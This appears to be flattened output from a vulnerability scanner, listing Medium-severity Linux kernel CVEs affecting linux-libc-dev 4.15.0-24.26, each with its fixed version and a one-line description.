Medium CVE-2020-10720 linux-libc-dev 4.15.0-24.264.15.0-60.67kernel: use-after-free read in napi_gro_frags() in the Linux kernel linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10757 linux-libc-dev 4.15.0-24.264.15.0-112.113kernel: kernel: DAX hugepages not considered during mremap linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10766 linux-libc-dev 4.15.0-24.264.15.0-115.116kernel: Rogue cross-process SSBD shutdown. Linux scheduler logical bug allows an attacker to turn off the SSBD protection. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10767 linux-libc-dev 4.15.0-24.264.15.0-115.116kernel: Indirect Branch Prediction Barrier is force-disabled when STIBP is unavailable or enhanced IBRS is available. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10768 linux-libc-dev 4.15.0-24.264.15.0-115.116kernel: Indirect branch speculation can be enabled after it was force-disabled by the PR_SPEC_FORCE_DISABLE prctl command. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10769 linux-libc-dev 4.15.0-24.264.15.0-55.60kernel: Buffer over-read in crypto_authenc_extractkeys() when a payload longer than 4 bytes is not aligned. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10773 linux-libc-dev 4.15.0-24.264.15.0-72.81kernel: kernel stack information leak on s390/s390x linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10942 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: vhost-net: stack overflow in get_raw_socket while checking sk_family field linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11494 linux-libc-dev 4.15.0-24.264.15.0-101.102kernel: transmission of uninitialized data allows attackers to read sensitive information linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11565 linux-libc-dev 4.15.0-24.264.15.0-101.102kernel: out-of-bounds write in mpol_parse_str function in mm/mempolicy.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11608 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11609 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: NULL pointer dereference due to incorrect handling of invalid descriptors in stv06xx subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11668 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11669 linux-libc-dev 4.15.0-24.264.15.0-101.102kernel: powerpc: guest can cause DoS on POWER9 KVM hosts linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11935 linux-libc-dev 4.15.0-24.264.15.0-112.113kernel: panic hit by kube-proxy iptables-save/restore linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12114 linux-libc-dev 4.15.0-24.264.15.0-106.107kernel: DoS by corrupting mountpoint reference counter linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12352 linux-libc-dev 4.15.0-24.264.15.0-122.124kernel: net: bluetooth: information leak when processing certain AMP packets linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12464 linux-libc-dev 4.15.0-24.264.15.0-106.107kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12653 linux-libc-dev 4.15.0-24.264.15.0-96.97kernel: buffer overflow in mwifiex_cmd_append_vsie_tlv function in drivers/net/wireless/marvell/mwifiex/scan.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12655 linux-libc-dev 4.15.0-24.264.15.0-115.116kernel: sync of excessive duration via an XFS v5 image with crafted metadata linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12657 linux-libc-dev 4.15.0-24.264.15.0-101.102kernel: use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12769 linux-libc-dev 4.15.0-24.264.15.0-96.97kernel: DoS via concurrent calls to dw_spi_irq and dw_spi_transfer_one functions in drivers/spi/spi-dw.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12826 linux-libc-dev 4.15.0-24.264.15.0-101.102kernel: possible to send arbitrary signals to a privileged (suidroot) parent process linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12888 linux-libc-dev 4.15.0-24.264.15.0-118.119Kernel: vfio: access to disabled MMIO space of some devices may lead to DoS scenario linux-libc-dev:4.15.0-24.26
Medium CVE-2020-14314 linux-libc-dev 4.15.0-24.264.15.0-121.123kernel: buffer uses out of index in ext3/4 filesystem linux-libc-dev:4.15.0-24.26
Medium CVE-2020-14356 linux-libc-dev 4.15.0-24.264.15.0-118.119kernel: Use After Free vulnerability in cgroup BPF component linux-libc-dev:4.15.0-24.26
Medium CVE-2020-14381 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: referencing inode of removed superblock in get_futex_key() causes UAF linux-libc-dev:4.15.0-24.26
Medium CVE-2020-14416 linux-libc-dev 4.15.0-24.264.15.0-91.92kernel: slcan : race over tty->disc_data can lead use-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2020-15436 linux-libc-dev 4.15.0-24.264.15.0-115.116kernel: use-after-free in fs/block_dev.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-15780 linux-libc-dev 4.15.0-24.264.15.0-112.113kernel: lockdown: bypass through ACPI write via acpi_configfs linux-libc-dev:4.15.0-24.26
Medium CVE-2020-16120 linux-libc-dev 4.15.0-24.264.15.0-121.123kernel: incorrect unprivileged overlayfs permission checking may lead to information disclosure linux-libc-dev:4.15.0-24.26
Medium CVE-2020-16166 linux-libc-dev 4.15.0-24.264.15.0-118.119kernel: information exposure in drivers/char/random.c and kernel/time/timer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-1749 linux-libc-dev 4.15.0-24.264.15.0-106.107kernel: some ipv6 protocols not encrypted over ipsec tunnel linux-libc-dev:4.15.0-24.26
Medium CVE-2020-24394 linux-libc-dev 4.15.0-24.264.15.0-115.116kernel: umask not applied on filesystem without ACL support linux-libc-dev:4.15.0-24.26
Medium CVE-2020-24586 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: Fragmentation cache not cleared on reconnection linux-libc-dev:4.15.0-24.26
Medium CVE-2020-24587 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: Reassembling fragments encrypted under different keys linux-libc-dev:4.15.0-24.26
Medium CVE-2020-24588 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: wifi frame payload being parsed incorrectly as an L2 frame linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25211 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25212 linux-libc-dev 4.15.0-24.264.15.0-121.123kernel: TOCTOU mismatch in the NFS client code linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25220 linux-libc-dev 4.15.0-24.264.15.0-118.119kernel: use-after-free because skcd->no_refcnt was not considered during the backport of CVE-2020-14356 linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25284 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: incomplete permission checking for access to rbd devices linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25641 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: soft-lockups in iov_iter_copy_from_user_atomic() could result in DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25643 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25645 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: Geneve/IPsec traffic may be unencrypted between two Geneve endpoints linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25668 linux-libc-dev 4.15.0-24.264.15.0-129.132kernel: race condition in fg_console can lead to use-after-free in con_font_op linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25670 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: refcount leak in llcp_sock_bind() linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25671 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: refcount leak in llcp_sock_connect() linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25672 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: memory leak in llcp_sock_connect() linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25673 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: non-blocking socket in llcp_sock_connect() linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25704 linux-libc-dev 4.15.0-24.264.15.0-135.139kernel: perf_event_parse_addr_filter memory linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25705 linux-libc-dev 4.15.0-24.264.15.0-129.132kernel: ICMP rate limiting can be used for DNS poisoning attack linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26088 linux-libc-dev 4.15.0-24.264.15.0-121.123kernel: missing CAP_NET_RAW check in NFC socket creation in net/nfc/rawsock.c allows local attackers to create raw sockets linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26139 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: Forwarding EAPOL from unauthenticated wifi client linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26147 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: reassembling mixed encrypted/plaintext fragments linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26555 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26558 linux-libc-dev 4.15.0-24.264.15.0-151.157bluez: Passkey Entry protocol of the Bluetooth Core is vulnerable to an impersonation attack linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27066 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: use after free in xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c leads to local escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27068 linux-libc-dev 4.15.0-24.264.15.0-99.100Product: AndroidVersions: Android kernelAndroid ID: A-127973231Referen ... linux-libc-dev:4.15.0-24.26
Medium CVE-2020-2732 linux-libc-dev 4.15.0-24.264.15.0-91.92Kernel: kvm: nVMX: L2 guest may trick the L0 hypervisor to access sensitive L1 resources linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27673 linux-libc-dev 4.15.0-24.264.15.0-129.132kernel: xen: guest OS users can cause a DoS via a high rate of events to dom0 (XSA-332) linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27777 linux-libc-dev 4.15.0-24.264.15.0-129.132kernel: powerpc: RTAS calls can be used to compromise kernel integrity linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27786 linux-libc-dev 4.15.0-24.264.15.0-109.110kernel: use-after-free in kernel midi subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27815 linux-libc-dev 4.15.0-24.264.15.0-136.140kernel: Array index out of bounds access when setting extended attributes on journaling filesystems. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-28097 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: out-of-bounds read/write in vgacon_scrolldelta function linux-libc-dev:4.15.0-24.26
Medium CVE-2020-28915 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: out-of-bounds read in fbcon_get_font function linux-libc-dev:4.15.0-24.26
Medium CVE-2020-28974 linux-libc-dev 4.15.0-24.264.15.0-129.132kernel: slab-out-of-bounds read in fbcon linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29368 linux-libc-dev 4.15.0-24.264.15.0-115.116kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29370 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: Race condition in SLUB bulk alloc slowpath linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29371 linux-libc-dev 4.15.0-24.264.15.0-121.123kernel: crafted romfs filesystem leaks uninitialized memory to userspace linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29374 linux-libc-dev 4.15.0-24.264.15.0-136.140kernel: the get_user_pages implementation when used for a copy-on-write page does not properly consider the semantics of read operations and therefore can grant unintended read access linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29660 linux-libc-dev 4.15.0-24.264.15.0-136.140kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2020-35519 linux-libc-dev 4.15.0-24.264.15.0-136.140kernel: x25_bind out-of-bounds read linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36158 linux-libc-dev 4.15.0-24.264.15.0-137.141kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36312 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: memory leak upon a kmalloc failure in kvm_io_bus_unregister_dev function in virt/kvm/kvm_main.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36322 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: fuse: fuse_do_getattr() calls make_bad_inode() in inappropriate situations linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36385 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: use-after-free in drivers/infiniband/core/ucma.c ctx use-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36386 linux-libc-dev 4.15.0-24.264.15.0-118.119kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-3702 linux-libc-dev 4.15.0-24.264.15.0-161.169kernel: ath9k: information disclosure via specifically timed and handcrafted traffic linux-libc-dev:4.15.0-24.26
Medium CVE-2020-4788 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: speculation on incompletely validated data on IBM Power9 linux-libc-dev:4.15.0-24.26
Medium CVE-2020-7053 linux-libc-dev 4.15.0-24.264.15.0-76.86kernel: use-after-free in i915_ppgtt_close in drivers/gpu/drm/i915/i915_gem_gtt.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8428 linux-libc-dev 4.15.0-24.264.15.0-96.97kernel: use-after-free in fs/namei.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8647 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: out-of-bounds read in in vc_do_resize function in drivers/tty/vt/vt.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8648 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: use-after-free in n_tty_receive_buf_common function in drivers/tty/n_tty.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8649 linux-libc-dev 4.15.0-24.264.15.0-99.100kernel: invalid read location in vgacon_invert_region function in drivers/video/console/vgacon.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8694 linux-libc-dev 4.15.0-24.264.15.0-123.126kernel: Insufficient access control vulnerability in PowerCap Framework linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8832 linux-libc-dev 4.15.0-24.264.15.0-91.92kernel: incomplete fix for CVE-2019-14615 allows for a local information exposure linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8834 linux-libc-dev 4.15.0-24.264.15.0-96.97Kernel: ppc: kvm: conflicting use of HSTATE_HOST_R1 to store r1 state leads to host stack corruption linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0129 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: Improper access control in BlueZ may allow information disclosure vulnerability. linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0342 linux-libc-dev 4.15.0-24.264.15.0-115.116kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0448 linux-libc-dev 4.15.0-24.264.15.0-126.129[Unknown description] linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0512 linux-libc-dev 4.15.0-24.264.15.0-143.147kernel: out-of-bounds write due to a heap buffer overflow in __hidinput_change_resolution_multipliers() of hid-input.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0605 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: In pfkey_dump() dplen and splen can both be specified to access the xfrm_address_t structure out of bounds linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0920 linux-libc-dev 4.15.0-24.264.15.0-159.167kernel: Use After Free in unix_gc() which could result in a local privilege escalation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0937 linux-libc-dev 4.15.0-24.264.15.0-144.148[Unknown description] linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0941 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2021-1048 linux-libc-dev 4.15.0-24.264.15.0-126.129kernel: Use After Free in epoll_loop_check_proc() which could result in a local privilege escalation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-20321 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: In Overlayfs missing a check for a negative dentry before calling vfs_rename() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-20322 linux-libc-dev 4.15.0-24.264.15.0-167.175kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies linux-libc-dev:4.15.0-24.26
Medium CVE-2021-21781 linux-libc-dev 4.15.0-24.264.15.0-143.147kernel: arm: SIGPAGE information disclosure vulnerability linux-libc-dev:4.15.0-24.26
Medium CVE-2021-22543 linux-libc-dev 4.15.0-24.264.15.0-159.167kernel: Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks linux-libc-dev:4.15.0-24.26
Medium CVE-2021-22600 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: double free in packet_set_ring() in net/packet/af_packet.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-23133 linux-libc-dev 4.15.0-24.264.15.0-147.151kernel: Race condition in sctp_destroy_sock list_del linux-libc-dev:4.15.0-24.26
Medium CVE-2021-23134 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: use-after-free in nfc sockets linux-libc-dev:4.15.0-24.26
Medium CVE-2021-26401 linux-libc-dev 4.15.0-24.264.15.0-177.186hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 linux-libc-dev:4.15.0-24.26
Medium CVE-2021-26932 linux-libc-dev 4.15.0-24.264.15.0-143.147An issue was discovered in the Linux kernel 3.2 through 5.10.16, as us ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-27363 linux-libc-dev 4.15.0-24.264.15.0-139.143kernel: iscsi: unrestricted access to sessions and handles linux-libc-dev:4.15.0-24.26
Medium CVE-2021-27364 linux-libc-dev 4.15.0-24.264.15.0-139.143kernel: out-of-bounds read in libiscsi module linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28038 linux-libc-dev 4.15.0-24.264.15.0-143.147An issue was discovered in the Linux kernel through 5.11.3, as used wi ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28660 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: buffer overflow in rtw_wx_set_scan function in drivers/staging/rtl8188eu/os_dep/ioctl_linux.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28714 linux-libc-dev 4.15.0-24.264.15.0-169.177Guest can force Linux netback driver to hog large amounts of kernel me ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28715 linux-libc-dev 4.15.0-24.264.15.0-169.177Guest can force Linux netback driver to hog large amounts of kernel me ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28964 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: race condition in get_old_root function in fs/btrfs/ctree.c because of a lack of locking on an extent buffer before a cloning operation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28971 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28972 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: Buffer overflow in hotplug/rpadlpar_sysfs.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-29155 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory linux-libc-dev:4.15.0-24.26
Medium CVE-2021-29264 linux-libc-dev 4.15.0-24.264.15.0-143.147kernel: DoS due to negative fragment size calculation in drivers/net/ethernet/freescale/gianfar.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-29265 linux-libc-dev 4.15.0-24.264.15.0-143.147kernel: race conditions in usbip_sockfd_store function in drivers/usb/usbip/stub_dev.c can lead to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2021-29650 linux-libc-dev 4.15.0-24.264.15.0-143.147kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2021-30002 linux-libc-dev 4.15.0-24.264.15.0-143.147kernel: memory leak for large arguments in video_usercopy function in drivers/media/v4l2-core/v4l2-ioctl.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-31829 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory linux-libc-dev:4.15.0-24.26
Medium CVE-2021-31916 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: out of bounds array access in drivers/md/dm-ioctl.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-32399 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: race condition for removal of the HCI controller linux-libc-dev:4.15.0-24.26
Medium CVE-2021-33033 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-33034 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan linux-libc-dev:4.15.0-24.26
Medium CVE-2021-33098 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: Improper input validation in the Intel(R) Ethernet ixgbe driver may allow an authenticated user to potentially enable DoS via local access linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3347 linux-libc-dev 4.15.0-24.264.15.0-141.145kernel: Use after free via PI futex state linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3348 linux-libc-dev 4.15.0-24.264.15.0-141.145kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3483 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: use-after-free in nosy driver in nosy_ioctl() in drivers/firewire/nosy.c when a device is added twice linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3506 linux-libc-dev 4.15.0-24.264.15.0-173.182kernel: Out of bounds memory access bug in get_next_net_page() in fs/f2fs/node.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3564 linux-libc-dev 4.15.0-24.264.15.0-154.161kernel: double free in bluetooth subsystem when the HCI device initialization fails linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3573 linux-libc-dev 4.15.0-24.264.15.0-154.161kernel: use-after-free in function hci_sock_bound_ioctl() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3612 linux-libc-dev 4.15.0-24.264.15.0-156.163kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3640 linux-libc-dev 4.15.0-24.264.15.0-167.175kernel: use-after-free vulnerability in function sco_sock_sendmsg() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3655 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: missing size validations on inbound SCTP packets linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3659 linux-libc-dev 4.15.0-24.264.15.0-144.148kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3732 linux-libc-dev 4.15.0-24.264.15.0-159.167kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3743 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3752 linux-libc-dev 4.15.0-24.264.15.0-167.175kernel: possible use-after-free in bluetooth module linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3753 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: a race out-of-bound read in vt linux-libc-dev:4.15.0-24.26
Medium CVE-2021-37576 linux-libc-dev 4.15.0-24.264.15.0-159.167kernel: powerpc: KVM guest OS users can cause host OS memory corruption linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3759 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3760 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: nfc: Use-After-Free vulnerability of ndev->rf_conn_info object linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3764 linux-libc-dev 4.15.0-24.264.15.0-163.171kernel: DoS in ccp_run_aes_gcm_cmd() function linux-libc-dev:4.15.0-24.26
Medium CVE-2021-38160 linux-libc-dev 4.15.0-24.264.15.0-156.163kernel: data corruption or loss can be triggered by an untrusted device that supplies a buf->len value exceeding the buffer size in drivers/char/virtio_console.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-38198 linux-libc-dev 4.15.0-24.264.15.0-161.169kernel: arch/x86/kvm/mmu/paging_tmpl.h incorrectly computes the access permissions of a shadow page linux-libc-dev:4.15.0-24.26
Medium CVE-2021-38199 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: incorrect connection-setup ordering allows operators of remote NFSv4 servers to cause a DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2021-38208 linux-libc-dev 4.15.0-24.264.15.0-154.161kernel: NULL pointer dereference in net/nfc/llcp_sock.c by making a getsockname call after a certain type of failure of a bind call linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3894 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: sctp: local DoS: unprivileged user can cause BUG() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39633 linux-libc-dev 4.15.0-24.264.15.0-162.170In gre_handle_offloads of ip_gre.c, there is a possible page fault due ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39634 linux-libc-dev 4.15.0-24.264.15.0-126.129In fs/eventpoll.c, there is a possible use after free. This could lead ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39648 linux-libc-dev 4.15.0-24.264.15.0-137.141kernel: possible disclosure of memory due to a race condition in gadget_dev_desc_UDC_show() of configfs.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39656 linux-libc-dev 4.15.0-24.264.15.0-144.148In __configfs_open_file of file.c, there is a possible use-after-free ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39657 linux-libc-dev 4.15.0-24.264.15.0-141.145In ufshcd_eh_device_reset_handler of ufshcd.c, there is a possible out ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39685 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: USB gadget buffer overflow linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39698 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: use-after-free in the file polling implementation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39711 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: out-of-bounds read due to Incorrect size value in bpf_prog_test_run_skb() of test_run.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4037 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: security regression for CVE-2018-13405 linux-libc-dev:4.15.0-24.26
Medium CVE-2021-40490 linux-libc-dev 4.15.0-24.264.15.0-161.169kernel: race condition was discovered in ext4_write_inline_data_end in fs/ext4/inline.c in the ext4 subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4083 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: fget: check that the fd still exists after getting a ref to it linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4149 linux-libc-dev 4.15.0-24.264.15.0-184.194kernel: Improper lock operation in btrfs linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4155 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: xfs: raw block device data leak in XFS_IOC_ALLOCSP IOCTL linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4157 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: Buffer overwrite in decode_nfs_fh function linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4197 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: cgroup: Use open-time creds and namespace for migration perm checks linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4202 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: Race condition in nci_request() leads to use after free while the device is getting removed linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4203 linux-libc-dev 4.15.0-24.264.15.0-163.171kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses linux-libc-dev:4.15.0-24.26
Medium CVE-2021-42252 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: memory overwrite in the kernel with potential privileges execution linux-libc-dev:4.15.0-24.26
